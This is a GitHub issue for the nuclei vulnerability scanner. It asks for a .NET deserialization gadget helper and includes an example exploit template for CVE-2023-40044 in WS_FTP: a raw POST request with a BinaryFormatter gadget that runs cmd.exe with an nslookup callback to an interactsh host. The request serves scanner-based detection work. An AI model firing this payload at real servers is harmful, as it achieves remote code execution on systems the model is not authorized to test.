nuclei icon indicating copy to clipboard operation
nuclei copied to clipboard
verified publisher icon projectdiscovery

Support for .NET deserialization helpers

Open ehsandeep opened this issue 2 years ago • 1 comments

Please describe your feature request:

Similar to generate_java_gadget, additional deserialization helpers need to be added to support writing templates for exploits, including deserialization payload for .NET formatters.

Reference: https://github.com/pwntester/ysoserial.net

Describe the use case of this feature:

Requires for CVE-2023-40044

Example:

{{generate_dotNet_gadget(gadget, format, cmd, encoding}}

http:
  - raw:
      - |
        POST /AHT/AhtApiService.asmx/AuthUser HTTP/2
        Host: {{Hostname}}
        Cookie: ASP.NET_SessionId=lilzf4yfwobb5fsaelo5abez
        Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266
        -----------------------------9051914041544843365972754266
        Content-Disposition: form-data; name="";
        ::AHT_DEFAULT_UPLOAD_PARAMETER::{{generate_dotNet_gadget("TypeConfuseDelegate", "BinaryFormatter", "cmd.exe /C nslookup {{interactsh-url}}", "base64"}}
        -----------------------------9051914041544843365972754266---

Example: https://github.com/projectdiscovery/nuclei-templates/pull/8296

Reference https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044

ehsandeep avatar Oct 01 '23 12:10 ehsandeep

+1 commenting to follow

l0nedigit avatar Oct 05 '23 20:10 l0nedigit